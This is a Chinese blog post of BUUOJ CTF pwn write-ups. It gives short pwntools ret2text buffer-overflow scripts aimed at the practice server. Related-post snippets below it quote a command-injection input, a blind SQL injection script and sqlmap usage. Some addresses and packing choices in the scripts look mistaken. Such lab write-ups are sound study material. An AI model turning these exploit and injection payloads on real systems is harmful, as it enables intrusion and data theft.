buu刷题记录

于 2024-09-19 20:28:05 发布
阅读量288 收藏 4
点赞数 5
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_81899310/article/details/142357399
版权

1.text_your_nc

签到题,直接nc一下

2.rip

checksec一下,发现没开啥保护,是64位程序

丢进ida,发现gets函数存在栈溢出漏洞

同时发现fun函数,那就是ret2text的题型。

找偏移,构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29576)
system = 0x4001187
payload = b'a' * 23 + p64(system)
p.sendline(payload)
p.interactive()

3.warmup_csaw_2016
checksec一下,啥也没开,是64位程序

丢进ida里,发现gets函数可以向v5数组里写入超长数据进而造成栈溢出。同样找到了后门函数,又是ret2text。

找offset,构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29896)
system = 0x400611
payload = b'a' * 0x40 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()

4.ciscn_2019_n_1 1

64位程序开启了NX保护

放进ida,一眼还是ret2text

直接构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29878)
system = 0x4006be
payload = b'a' * 0x30 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()

5.pwn1_sctf_2016

开启了NX保护是32位程序

放进ida,首先向S数组读入了32字节,这不足以造成栈溢出

并且在左侧函数栏发现了get_flag函数

通过运行输入尝试发现当我们输入I时,它会将I变为you进行输出,所以我们可以利用这种转换关系来进行栈溢出,这道题实质上还是ret2text

构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',25132)
system = 0x8048F0d
#0x3c = 60
payload = b'I' * 20  + b'a' * 4 + p64(system)
p.sendline(payload)
p.interactive()

6.jarvisoj_level0

igiohhh
关注
BUUOJ-Web-题记
x0r
09-01 443
为提升观感体验,本篇博文长期更新,新目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
BUU题记
Sapphire037的博客
08-24 408
[FBCTF2019]RCEService 不会做,看了wp不知道哪来的源码,用json格式传,知识点就是绕过preg_match的方法,回溯,数组(这没用),换行符%0A [Zer0pts2020]Can you guess it? 进入页面得到源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
buuoj题记2
臭nana的博客
06-11 328
[GYCTF2020]Ezsqli 首先从目名字就能知道这是道SQL注入 打开目测一下,输入1打印Nu1L,输入2打印V&N,其他的数字是报没有查询结果的错 加个单引号试试,显示bool(false) 布尔盲注 import requests url = "http://0a02ac5a-9801-4b63-a153-6d331955650d.node3.buuoj.cn/index.php" database = "" key='' for i in range(1
buuoj题记 - babyfengshui_33c3_2016
qq_34010404的博客
03-16 209
检查程序保护: 拖进IDA看一下,add,show,edit,free 有一个全局的数组,每一个元素是一个地址,执行一个User结构体。 分析一下可以知道User结构体大概是这样子: struct User { char* szUserDescription; char szUserName[124]; } add函数: add函数调用了readDescription函数: 其中存在问的就位于该函数内,该函数在Update内被会被调用. add函数内需要注意的一个地方,就是readDescrip
buuoj题记 - [极客大挑战 2019]Not Bad
qq_34010404的博客
03-28 415
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
buuoj题记 - npuctf_2020_easyheap
qq_34010404的博客
03-26 237
目给了add,show,edit,del函数 问在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配大小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8.
BUU题记(三)
山高路远
04-10 3137
buu——pwn学习 十、铁人三项(第五赛区)_2018_rop checksec一下,开启了nx保护,然后拖入ida 呃。。。应该就是比较熟悉的rop的构建了,直接上exp吧,这类目做挺多的了: 十一、gyctf_2020_borrowstack 先做下这,一直想完整的了解栈迁移,借着这真正的掌握栈迁移的手法和知识点吧,先checksec一下,再拖入ida分析 里面很简单,没有什么复杂的函数,很适合借此了解栈迁移!首先read函数读取的字节数不够,只能够刚好覆盖返回地址。第二输入点的位置是b
BUU题记-2020.11.7
Georgeiweb的博客
11-08 900
RSA 目:给了两个文件,一个pub.key,另一个为flag.enc 解思路:先把pub.key文件改为txt文件,然后就可以打开,内容是rsa的公钥, 所以直接使用在线工具解出e,n 公钥解析 然后在有n=p*q再用在线工具 factordb ...
BUU题记Crypto rsaroll
m0_74195679的博客
12-20 197
buu crypto rsaroll
BUU逆向题记 -01
m0_48432869的博客
05-18 315
easyre 查壳,64位,ida64打开 reverse1 查壳,64位,shift+f12查看字符串,交叉引用找到关键函数 注意有个把 'o’替换成’0’的处理过程。 reverse2 与reverse1类似。 内涵的软件 找到主函数,flag就在里面 新年快乐 查壳,有个upx的壳,用工具脱壳用用ida64载入 找到flag! helloworld android逆向,用android相关工具比如android killer、APKIDE、jadx打开在Mainactivity里面就可
buuoj笔记
q1415500189的博客
01-22 1031
buuoj
buuoj题记 - ciscn_2019_final_3
qq_34010404的博客
03-25 517
看了大佬们的思路才做出来的,这里只记录一下做中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
BUU题记
as you know, nlp is fantasitc!
08-10 476
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
BUUWeb题记
dangejinghong的博客
04-23 990
但是,如果要接着直接查这个flag就会出现问了,select等关键词被过滤了,所以我们只能另辟蹊径,根据从网上大佬的wp学习,可以将。file=phar://压缩包/内部文件 phar://xxx.png/shell.php (zip要用#隔开,这个用/)file=php://filter/read=convert.base64-encode/resource=xxxx.php。发现他将空格过滤了,不过通过网上学习,发现可以用一些字符绕过空格,例如。
BUU题记(四)
山高路远
04-12 544
以下几的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的目,先不按顺序 十七、ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部分,可以修改got表(后面没用到就是了) 进入ida看看反汇编代码 总共有着四个功能,第一个new note: 在第一个功能里面,可以创建一个堆,堆里面第一个存放的是printf函数指针,第二存放了一个free函数指针,第三个存放有区别,当type==1,存放的是一个数据,type ==2,存放的是字符串
[buuctf]题记web
qq_61109509的博客
05-12 959
文章目pingpingping[极客大挑战]http pingpingping 打开后发现要传ip,想到ping命令,先尝试传入127.1.1.1 但是当我们打开flag.php时,发现 /?ip= fxck your space! 说明空格过滤。但是当我们绕过空格时,发现<,%09,$IFS都不起作用 原因是用 $IFS的话,会认为解析没结束,会把后面的也当做参数解析,而 $IFS$9的话,结束了 $IFS 后加上了一个不存在或者说空字符串的变量。所以解析为空,但结束了 $IFS正常执行后面
BUU OJ 做题记
weixin_30920597的博客
08-08 379
buu oj库的质量很高,这里记录一下 1.WarmUp 代码审计 查看源码发现提示source.php和hint.php source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$p...
buuoj题记 - pwnable_hacknote
qq_34010404的博客
03-19 339
查看程序保护: 拖进IDA分析一下, Add函数正常,先创建八个字节的内存 struct Node{ { void* func_addr; void* content; } 然后根据输入的size开辟相应大小的内存 问存在于DelNote函数中,free后没有置0 看一下PrintNote函数: 根据八个字节的前四个字节调用对应的函数,并把这个八个字节的首地址作为参数 若Note被free后,还是可以调用Print函数的,由于不确定func_addr是什么,所以会出现问. 构造方法: 先Add两
BUU题记——7
weixin_43610673的博客
02-20 6005
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎杯 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登无session,id不传值得话就可以进入if语句,跟进_fo
buu sql
最新发布
03-09
### 关于BUU SQL教程及问解决方案 #### 获取当前数据库名称与用户名 对于SQL注入练习,可以通过特定的查询来获取当前使用的数据库名称以及执行查询的用户名。例如,在`/backend/content_detail.php?id=-1 union select database(), user()`这条语句中,通过联合查询的方式,可以成功返回当前数据库的名字和用户的账号信息[^1]。 #### 使用sqlmap自动化工具进行数据提取 当面对可能存在SQL注入漏洞的目标站点时,除了手动构造payload外,还可以借助像sqlmap这样的自动化渗透测试工具来进行更深入的数据挖掘工作。命令行参数如`-D`, `-T`, `-C`分别用于指定目标数据库、表单以及感兴趣的列名;而`--dump`选项则用来导出选定表格中的全部记录。这有助于快速定位并验证潜在的安全隐患[^2]。 #### 探索MySQL内置的信息模式(Information Schema) 为了更好地理解数据库结构,可利用information_schema这一特殊的只读数据库。其中包含了关于其他数据库及其对象的各种元数据,比如库名(`table_schema`)、表名(`tables.table_name`)等重要属性。这些信息可以帮助攻击者进一步探索系统的内部组成情况。值得注意的是,在某些情况下,仅需调整union select后的字段顺序就能实现所需信息的有效展示[^3]。 #### 实战案例分享 在一个具体的实例中提到,如果已知某页面存在三个显示区域,则可以直接尝试使用如下形式的SQL注入表达式:`id=-1 union select 1,'fllllag',null from id--+` 来试图读取名为'id'的表内的flag值。此方法展示了如何巧妙运用现有条件完成特定任务的同时也提醒开发者注意输入校验的重要性[^4]。 ```sql SELECT version(); ``` 上述代码片段可用于请求服务器端所运行的具体MySQL版本号。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值